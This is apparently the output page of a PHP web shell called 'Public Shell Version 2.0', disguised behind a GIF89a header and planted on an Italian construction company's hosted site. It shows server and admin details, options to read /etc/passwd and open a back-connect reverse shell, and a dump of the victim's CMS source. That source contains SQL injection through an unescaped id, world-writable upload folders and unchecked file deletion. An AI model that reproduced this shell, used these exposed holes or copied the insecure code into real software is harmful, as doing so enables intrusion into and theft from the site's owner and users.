GIF89a

Public Shell

Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt : '; Public Shell Version 2.0

Disable Functions: system,popen,dl,passthru,proc_open,shell_exec

Current Path : /web/htdocs/www.giancio.com/home/admin/function/

Current File : /web/htdocs/www.giancio.com/home/admin/function/news_appoggio.php

<?php //////////////////////////NEWS function listan() { global $conn, $id; $output = '<div class="row"> <div class="col-md-6"> <div class="headline"> <h3>Lista Lavori</h3> </div> </div> <div class="col-md-4 padding-top10"> <form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultn" method="post"> <div class="input-group"> <input class="form-control" type="text" name="ricerca"> <span class="input-group-btn"> <button class="btn btn-danger" type="submit"><i class="icon-search"></i></button> </span> </div> </form> </div> <div class="col-md-2 padding-top10"> <a href="?azione=inseriscin" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a> </div> </div>'; $output .= '<div class="row"> <div class="col-md-12"> <div class="table-wrapper"> <div class="wrapper-panel"> <table class="table table-striped" id="tab" > <thead> <tr> <th>Titolo</th> <th>Tipologia</th> <th>Data</th> <th>Categorie</th> <th></th> <th></th> </tr> </thead> <tbody>'; $result=mysql_query('SELECT * FROM lavori order by lav_id DESC'); while($row=mysql_fetch_assoc($result)) { if($row['lav_tipo']==0){$row['lav_tipo']='In Corso';} if($row['lav_tipo']==1){$row['lav_tipo']='Eseguito';} $g=substr($row['lav_data'],8,2); $m=substr($row['lav_data'],5,2); $mesi["01"]="Gennaio"; $mesi["02"]="Febbraio"; $mesi["03"]="Marzo"; $mesi["04"]="Aprile"; $mesi["05"]="Maggio"; $mesi["06"]="Giugno"; $mesi["07"]="Luglio"; $mesi["08"]="Agosto"; $mesi["09"]="Settembre"; $mesi["10"]="Ottobre"; $mesi["11"]="Novembre"; $mesi["12"]="Dicembre"; $mese=$mesi[$m]; $a=substr($row['lav_data'],0,4); $data=$g.' '.$mese.' '.$a; $giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato'); $giornosettimana=($row['lav_data']); if($row['lav_costruzioni']==0){$row['lav_costruzioni']=NULL;} else{$row['lav_costruzioni']='<span class="label label-warning">Nuove Costruzioni</span>';} if($row['lav_ristrutturazioni']==0){$row['lav_ristrutturazioni']=NULL;} else{$row['lav_ristrutturazioni']='<span class="label label-success">Ristrutturazioni</span>';} if($row['lav_commerciali']==0){$row['lav_commerciali']=NULL;} else{$row['lav_commerciali']='<span class="label label-danger">Commerciali</span>';} if($row['lav_eventi']==0){$row['lav_eventi']=NULL;} else{$row['lav_eventi']='<span class="label label-default">Eventi</span>';} if($row['lav_privati']==0){$row['lav_privati']=NULL;} else{$row['lav_privati']='<span class="label label-info">Privati</span>';} $output.='<tr> <td><a href="?azione=visualizzan&id='.$row['lav_id'].'"><i class="icon-signin"></i>  '.$row['lav_titolo'].'</a></td> <td>'.$row['lav_tipo'].'</td> <td>'.$data.'</td> <td>'.$row['lav_costruzioni'].' '.$row['lav_ristrutturazioni'].' '.$row['lav_commerciali'].' '.$row['lav_eventi'].' '.$row['lav_privati'].'</td>'; $output.=' <td><a title="Modifica" href="?azione=modifican&id='.$row['lav_id'].'"><i class="icon-edit"></i></a></td> <td><a class="right cancel show-option" title="Elimina" href="?azione=eliminan&id='.$row['lav_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>'; $output.='</tr>'; } $output .= '</tbody> </table> </div>  </div> </div> </div>'; return ($output); } function resultn() { global $conn, $id; $result = mysql_real_escape_string($_POST['ricerca']); $output = '<div class="row"> <div class="col-md-6"> <div class="headline"> <h3>Lista Lavori</h3> </div> </div> <div class="col-md-4 padding-top10"> <form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultn" method="post"> <div class="input-group"> <input class="form-control" type="text" name="ricerca"> <span class="input-group-btn"> <button class="btn btn-danger" type="submit"><i class="icon-search"></i></button> </span> </div> </form> </div> <div class="col-md-2 padding-top10"> <a href="?azione=inseriscin" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a> </div> </div>'; $output .= '<div class="row"> <div class="col-md-12"> <div class="table-wrapper"> <div class="wrapper-panel"> <table class="table table-striped" id="tab" > <thead> <tr> <th>Titolo</th> <th>Tipologia</th> <th>Data</th> <th>Categorie</th> <th></th> <th></th> </tr> </thead> <tbody>'; $result=mysql_query('SELECT * FROM lavori WHERE lav_titolo like \'%' . $result . '%\' order by lav_id DESC'); while($row=mysql_fetch_assoc($result)) { if($row['lav_tipo']==0){$row['lav_tipo']='In Corso';} if($row['lav_tipo']==1){$row['lav_tipo']='Eseguito';} $g=substr($row['lav_data'],8,2); $m=substr($row['lav_data'],5,2); $mesi["01"]="Gennaio"; $mesi["02"]="Febbraio"; $mesi["03"]="Marzo"; $mesi["04"]="Aprile"; $mesi["05"]="Maggio"; $mesi["06"]="Giugno"; $mesi["07"]="Luglio"; $mesi["08"]="Agosto"; $mesi["09"]="Settembre"; $mesi["10"]="Ottobre"; $mesi["11"]="Novembre"; $mesi["12"]="Dicembre"; $mese=$mesi[$m]; $a=substr($row['lav_data'],0,4); $data=$g.' '.$mese.' '.$a; $giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato'); $giornosettimana=($row['lav_data']); if($row['lav_costruzioni']==0){$row['lav_costruzioni']=NULL;} else{$row['lav_costruzioni']='<span class="label label-warning">Nuove Costruzioni</span>';} if($row['lav_ristrutturazioni']==0){$row['lav_ristrutturazioni']=NULL;} else{$row['lav_ristrutturazioni']='<span class="label label-success">Ristrutturazioni</span>';} if($row['lav_commerciali']==0){$row['lav_commerciali']=NULL;} else{$row['lav_commerciali']='<span class="label label-danger">Commerciali</span>';} if($row['lav_eventi']==0){$row['lav_eventi']=NULL;} else{$row['lav_eventi']='<span class="label label-default">Eventi</span>';} if($row['lav_privati']==0){$row['lav_privati']=NULL;} else{$row['lav_privati']='<span class="label label-info">Privati</span>';} $output.='<tr> <td><a href="?azione=visualizzan&id='.$row['lav_id'].'"><i class="icon-signin"></i>  '.$row['lav_titolo'].'</a></td> <td>'.$row['lav_tipo'].'</td> <td>'.$data.'</td> <td>'.$row['lav_costruzioni'].' '.$row['lav_ristrutturazioni'].' '.$row['lav_commerciali'].' '.$row['lav_eventi'].' '.$row['lav_privati'].'</td>'; $output.=' <td><a title="Modifica" href="?azione=modifican&id='.$row['lav_id'].'"><i class="icon-edit"></i></a></td> <td><a class="right cancel show-option" title="Elimina" href="?azione=eliminan&id='.$row['lav_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>'; $output.='</tr>'; } $output .= '</tbody> </table> </div>  </div> </div> </div>'; return ($output); } function visualizzan() { global $conn, $id; $result=mysql_query('SELECT * FROM lavori WHERE lav_id='.$id.''); $row=mysql_fetch_assoc($result); if($row['lav_tipo']==0){$row['lav_tipo']='In Corso';} if($row['lav_tipo']==1){$row['lav_tipo']='Eseguito';} $g=substr($row['lav_data'],8,2); $m=substr($row['lav_data'],5,2); $mesi["01"]="Gennaio"; $mesi["02"]="Febbraio"; $mesi["03"]="Marzo"; $mesi["04"]="Aprile"; $mesi["05"]="Maggio"; $mesi["06"]="Giugno"; $mesi["07"]="Luglio"; $mesi["08"]="Agosto"; $mesi["09"]="Settembre"; $mesi["10"]="Ottobre"; $mesi["11"]="Novembre"; $mesi["12"]="Dicembre"; $mese=$mesi[$m]; $a=substr($row['lav_data'],0,4); $data=$g.' '.$mese.' '.$a; $giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato'); $giornosettimana=($row['lav_data']); if($row['lav_costruzioni']==0){$row['lav_costruzioni']=NULL;} else{$row['lav_costruzioni']='<span class="label label-warning">Nuove Costruzioni</span><br />';} if($row['lav_ristrutturazioni']==0){$row['lav_ristrutturazioni']=NULL;} else{$row['lav_ristrutturazioni']='<span class="label label-success">Ristrutturazioni</span><br />';} if($row['lav_commerciali']==0){$row['lav_commerciali']=NULL;} else{$row['lav_commerciali']='<span class="label label-danger">Commerciali</span><br />';} if($row['lav_eventi']==0){$row['lav_eventi']=NULL;} else{$row['lav_eventi']='<span class="label label-default">Eventi</span><br />';} if($row['lav_privati']==0){$row['lav_privati']=NULL;} else{$row['lav_privati']='<span class="label label-info">Privati</span>';} $output = ' <div class="row"> <div class="col-md-10"> <div class="headline"> <h3>'.$row['lav_titolo'].'</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div> <div class="row"> <div class="col-md-6"> <div class="row"> <div class="col-md-12"> <h4>Tipologia</h4> <p>'.$row['lav_tipo'].'</p> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Descrizione</h4> <p>'.$row['lav_desc'].'</p> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Data</h4> <p>'.$data.'</p> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Categorie</h4> '.$row['lav_costruzioni'].' '.$row['lav_ristrutturazioni'].' '.$row['lav_commerciali'].' '.$row['lav_eventi'].' '.$row['lav_privati'].' </div> </div> </div> <div class="col-md-6"> <div class="row">'; $result=mysql_query('SELECT * FROM img WHERE img_lav_id='.$id.''); while ($row=mysql_fetch_assoc($result)) { $output .=' <div class="col-sm-4"> <img width="100px" class="responsive" src="img/lavori/'.$row['img_href'].'" /> </div>'; } $output .='</div> </div> </div> </div><br /><br />'; return ($output); } function inseriscin() { global $conn, $id; $output = ' <div class="row"> <div class="col-md-10"> <div class="headline"> <h3>Inserisci Lavoro</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div> <div class="row"> <form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvan" method="post"> <div class="col-md-6"> <div class="row"> <div class="col-md-12"> <h4>Titolo</h4> <input class="form-control" type="text" placeholder="titolo" name="titolo"><br /> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Tipologia</h4> <select class="form-control" name="tipologia"> <option value="0">In corso</option> <option value="1">Eseguiti</option> </select><br /> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Descrizione</h4> <textarea class="form-control" type="text" id="descrizione" name="descrizione"></textarea> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Data</h4> <input class="form-control" id="miadata" type="text" placeholder="data" name="miadata"><br /> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Categoria</h4> <div class="checkbox"> <label> <input type="checkbox" value="1" name="nuove"> Nuove Costruzioni </label><br /> <label> <input type="checkbox" value="1" name="ristrutturazioni"> Ristrutturazioni </label><br /> <label> <input type="checkbox" value="1" name="commerciali"> Commerciali </label><br /> <label> <input type="checkbox" value="1" name="privati"> Privati </label><br /> <label> <input type="checkbox" value="1" name="eventi"> Eventi </label> </div> </div> </div> </div> <div class="col-md-6"> <div class="row">  <input type="hidden" id="contatore" name="contatore" value="1"> <input type="button" class="btn btn-danger pull-right" id="aggiungi_elemento" value="aggiungi immagine"><br /><br /> </div> <div class="row"> <table class="table" > <tbody> <tr class="riga"> <td> <div id="file1" class="divs"> <input type="file" id="img1" name="img1"> </div> </td> <td> <input style="display:none" type="button" id="aggiungi_testo" value="aggiungi testo"> </td> </tr> </tbody> </table> </div> </div> </div> <div class="row"> <div class="col-md-12"> <button class="btn btn-default" type="submit">Salva</button><br /><br /> </div> </div> </form> </div>'; return ($output); } function salvan() { global $conn, $id; $errore = 0; $titolo = mysql_real_escape_string($_POST['titolo']); $descrizione = mysql_real_escape_string($_POST['descrizione']); $tipologia = $_POST['tipologia']; $nuove = $_POST['nuove']; $ristrutturazioni = $_POST['ristrutturazioni']; $commerciali = $_POST['commerciali']; $privati = $_POST['privati']; $eventi = $_POST['eventi']; $miadata = $_POST['miadata']; $g = substr($miadata, 3, 2); $m = substr($miadata, 0, 2); $a = substr($miadata, 6, 4); $data = $a . '-' . $m . '-' . $g . ' 00:00:00'; if ($errore == 0) { if ($id == 0) { $sql = 'insert into lavori(lav_titolo, lav_desc, lav_data, lav_tipo, lav_costruzioni, lav_ristrutturazioni, lav_commerciali, lav_eventi, lav_privati) values("' . $titolo . '", "' . $descrizione . '", "' . $data . '", "' . $tipologia . '", "' . $nuove . '", "' . $ristrutturazioni . '", "' . $commerciali . '", "' . $privati . '", "' . $eventi . '")'; mysql_query($sql, $conn) or die(mysql_error()); $id=mysql_insert_id(); $result=mysql_query('SELECT * FROM lavori WHERE lav_id="'.$id.'"'); $row=mysql_fetch_assoc($result); $img_lav_id=$row['lav_id']; for($i=1; $i<10; $i++){ $img = $_FILES['img'.$i.'']; if($img!=NULL){ $sql2 = 'insert into img(img_href, img_lav_id) values("' . $img . '","' . $img_lav_id . '")'; mysql_query($sql2, $conn) or die(mysql_error()); $ins_id=mysql_insert_id(); } //************************************upload if(is_uploaded_file($_FILES['img'.$i.'']['tmp_name'])){ $cartella=$a.'_'.$m; $upload_dir='img/lavori/'.$cartella.'/'; //in produzione cambiare percorso!! if(!file_exists($upload_dir)){mkdir($upload_dir,0777);} $filename=$ins_id.'_'.$id.'_'.$_FILES['img'.$i.'']['name']; $estensioni_ammesse=array('jpg','jpeg','gif','png'); $estensione=substr($filename,strpos($filename,'.')+1,(strlen($filename)-strpos($filename,'.'))); if(in_array($estensione,$estensioni_ammesse)){ move_uploaded_file($_FILES['img'.$i.'']['tmp_name'],$upload_dir.$filename); $sql3='update img set img_href="'.$cartella.'/'.$filename.'" where img_id='.$ins_id.' '; mysql_query($sql3); } else{/*messaggio di errore*/} } } header('location: cms.php?ins&azione=listan'); } elseif ($id!=0) {//MODIFICA DELL'ARTICOLO $sql = 'update lavori set numero_numero="' . $numero . '", numero_vis="' . $pubblicato . '", numero_data="' . $data . '" where id="' . $id . '" '; $output = 'Record aggiornato.<br /><a href="index.php?azione=listan&page=1">Torna alla lista</a>'; mysql_query($sql, $conn) or die(mysql_error()); if(is_uploaded_file($_FILES['copertina']['tmp_name'])){ $cartella=$a.'_'.$m; $upload_dir='img/copertine/'.$cartella.'/'; //in produzione cambiare percorso!! if(!file_exists($upload_dir)){mkdir($upload_dir,0777);} $filename=$id.'_'.$_FILES['copertina']['name']; $estensioni_ammesse=array('jpg','jpeg','gif','png'); $estensione=substr($filename,strpos($filename,'.')+1,(strlen($filename)-strpos($filename,'.'))); if(in_array($estensione,$estensioni_ammesse)){ move_uploaded_file($_FILES['copertina']['tmp_name'],$upload_dir.$filename); $sql='update articoli set numero_copertina="'.$cartella.'/'.$filename.'" where numero_id='.$id.' '; mysql_query($sql); } else{/*messaggio di errore*/} } header('location: articoli.php?agg&azione=listaarticoli'); } } else {$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>'; } return ($output); } function modifican() { global $conn, $id; $result=mysql_query('SELECT * FROM lavori WHERE lav_id='.$id.''); $row=mysql_fetch_assoc($result); if($row['lav_tipo']==0){$tipologia='In Corso';} if($row['lav_tipo']==1){$tipologia='Eseguito';} $g=substr($row['lav_data'],8,2); $m=substr($row['lav_data'],5,2); $mesi["01"]="Gennaio"; $mesi["02"]="Febbraio"; $mesi["03"]="Marzo"; $mesi["04"]="Aprile"; $mesi["05"]="Maggio"; $mesi["06"]="Giugno"; $mesi["07"]="Luglio"; $mesi["08"]="Agosto"; $mesi["09"]="Settembre"; $mesi["10"]="Ottobre"; $mesi["11"]="Novembre"; $mesi["12"]="Dicembre"; $mese=$mesi[$m]; $a=substr($row['lav_data'],0,4); $data=$g.' '.$mese.' '.$a; $giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato'); $giornosettimana=($row['lav_data']); $output = ' <div class="row"> <div class="col-md-10"> <div class="headline"> <h3>Modifica Lavoro</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div> <div class="row"> <form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvan" method="post"> <div class="col-md-6"> <div class="row"> <div class="col-md-12"> <h4>Titolo</h4> <input class="form-control" type="text" placeholder="titolo" name="titolo" value="'.$row['lav_titolo'].'"><br /> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Tipologia</h4> <select class="form-control" name="tipologia"> <option value="'.$row['lav_tipo'].'">'.$tipologia.'</option> <option value="0">In corso</option> <option value="1">Eseguiti</option> </select><br /> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Descrizione</h4> <textarea class="form-control" type="text" id="descrizione" name="descrizione">'.$row['lav_desc'].'</textarea> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Data</h4> <input class="form-control" id="miadata" type="text" placeholder="data" name="miadata" value="'.$data.'"><br /> </div> </div> <div class="row"> <div class="col-md-12"> <h4>Categoria</h4> <div class="checkbox"> <label> <input type="checkbox" value="1" name="nuove"';if ($row['lav_costruzioni']==1){$output .='checked';}$output .=' /> Nuove Costruzioni </label><br /> <label> <input type="checkbox" value="1" name="ristrutturazioni"';if ($row['lav_ristrutturazioni']==1){$output .='checked';}$output .=' /> Ristrutturazioni </label><br /> <label> <input type="checkbox" value="1" name="commerciali"';if ($row['lav_commerciali']==1){$output .='checked';}$output .=' /> Commerciali </label><br /> <label> <input type="checkbox" value="1" name="privati"';if ($row['lav_privati']==1){$output .='checked';}$output .=' /> Privati </label><br /> <label> <input type="checkbox" value="1" name="eventi"';if ($row['lav_eventi']==1){$output .='checked';}$output .=' /> Eventi </label> </div> </div> </div> </div> <div class="col-md-6"> <div class="row">'; ///qui bisogna tirare fuoiri l'href e fare un unlin 2014_03/11_003_graf.png $result=mysql_query('SELECT * FROM img WHERE img_lav_id='.$id.''); while ($row=mysql_fetch_assoc($result)) { $file=substr($row['img_href'], 8); $cartella=substr($row['img_href'], 0, 7); $output .=' <div class="col-sm-4"> <img width="100px" class="responsive" src="img/lavori/'.$row['img_href'].'" /> <a href="?del&azione=modifican&id='.$id.'&delete=' . $file . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a> </div>'; } $output .='</div> <div class="row">  <input type="hidden" id="contatore" name="contatore" value="1"> <input type="button" class="btn btn-danger pull-right" id="aggiungi_elemento" value="aggiungi immagine"><br /><br /> </div> <div class="row"> <table class="table" > <tbody> <tr class="riga"> <td> <div id="file1" class="divs"> <input type="file" id="img1" name="img1"> </div> </td> <td> <input style="display:none" type="button" id="aggiungi_testo" value="aggiungi testo"> </td> </tr> </tbody> </table> </div> </div> </div> <div class="row"> <div class="col-md-12"> <button class="btn btn-default" type="submit">Salva</button><br /><br /> </div> </div> </form> </div>'; if (isset($_GET['delete'])){ $trovaunderscore=strpos($_GET['delete'], '_'); $idimg=(substr($_GET['delete'],0,$trovaunderscore)) ; global $conn, $id; $sql = 'DELETE FROM img WHERE img_id='.$idimg.''; mysql_query($sql) or die(mysql_error()); header('location: cms.php?del&azione=modifican&id='.$id.''); //////implementare l'inserimento con l'id dell'immagine per poterla cancellare dal db attraverso di esso $immagine = 'img/lavori/'.$cartella.'/' . $_GET['delete']; if (!unlink($immagine)) { echo("Impossibile eliminare $immagine <br>"); } else { } // echo("<br><a href=index.php?azione=listimg>Torna Indietro</a><br>"); } return ($output); } //fare altre funzioni tipo eliminaimgnres function eliminaimgnews() { } function eliminan() { global $conn, $id; $sql = 'delete from lavori where lav_id="' . $id . '"'; mysql_query($sql) or die(mysql_error()); header('location: cms.php?del&azione=listan'); } ?>

Public Shell Version 2.0